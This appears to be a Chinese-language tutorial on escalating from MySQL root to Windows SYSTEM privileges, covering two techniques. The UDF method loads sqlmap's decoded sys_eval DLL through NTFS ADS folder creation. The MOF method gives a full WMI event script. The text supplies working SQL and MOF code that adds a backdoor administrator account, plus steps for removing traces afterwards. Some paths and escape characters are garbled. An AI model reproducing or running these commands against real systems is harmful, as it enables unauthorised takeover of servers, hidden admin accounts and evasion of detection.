原理
udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。
通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。
0x01 思路
- 将udf文件上传到指定位置
sqlmap中有现成的udf文件,分为32位和64位,一定要选择对版本,否则会显示:Can‘t open shared library ‘udf.dll‘。
sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_
sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_
但是sqlmap 中 自带 的shell 以及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用的。
可以利用sqlmap 自带的解码工具cloak.py,进入到 sqlmap\extra\cloak\cloak 目录下打开powershell,执行命令:
cloak.py -d -i D:\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_
sqlmap中的udf文件提供的函数:
sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
sys_set,创建或修改一个环境变量。
有了udf文件,接下来就是利用各种办法上传到网站指定目录下
MySQL<5.0,导出路径随意;
5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)
MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。
一般Lib、Plugin文件夹需要手工建立(可用NTFS ADS流模式突破进而创建文件夹)有webshell可以直接创建,没有的话使用 into dumpfile 写入
select @@basedir; //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录
2. 从udf文件中引入自定义函数
create function sys_eval returns string soname 'udf.dll'; //sys_eval是函数名称,udf.dll是
lib_mysqludf_sys.dll_上传后的文件名
3. 执行自定义函数
//新建账号waitalone,密码为waitalone.cn
select sys_eval('net user waitalone waitalone.cn /add');
//将waitalone加入管理员组
select sys_eval('net localgroup administrators waitalone /add');
4.清除痕迹
drop function cmdshell; 删除函数
delete from mysql.func where name=‘cmdshell’ 删除函数
0x02 参考资料
http://www.mamicode.com/info-detail-2294087.html
https://www.waitalone.cn/mysql-tiquan-summary.html
https://blog.csdn.net/x728999452/article/details/52413974
https://www.cnblogs.com/xishaonian/p/6016486.html
mof提权
原理
mof是Windows系统的一个文件,位于c:windowssystem32wbemmofnullevt.mof,叫做托管对象格式, 它的作用是每隔5秒,就会去监控进程的创建和死亡。mof提权的简单利用过程就是,拥有了MySQL的root权限 后,使用root权限去执行上传操作,将我们重新改写过的mof文件上传,之后,这个文件会被服务器每隔5秒 以system权限执行。这个改写的mof中,有一段是vbs脚本,这个vbs大多数是cmd的添加管理员用户的命令。
为什么可以提权?
可以提权的根本原因是因为有一个更高权限的线程执行了命令。我们这里nullevt.mof文件的加载过程由system 用户执行,因此我们可以最高把用户的权限提升到system。
利用条件
Windows版本<=2003
c:windowssystem32wbemmof目录可写入
数据库允许外连,且已知root账号密码
利用代码:
这个是创建用户
# pragma namespace("\.rootsubscription")
instance of **EventFilter as $EventFilter{ EventNamespace = "RootCimv2"; Name = "filtP2"; Query = "Select * From **InstanceModificationEvent "
"Where TargetInstance Isa "Win32_LocalTime" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user admin admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
然后把上面的脚本这行更改一下 :
"var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe administrator admin /add")";
参考资料:
https://www.cnblogs.com/h4ck0ne/p/5154629.html
https://www.cnblogs.com/wh4am1/p/6613770.html
https://www.dazhuanlan.com/2020/01/02/5e0d9f6d5cbcd/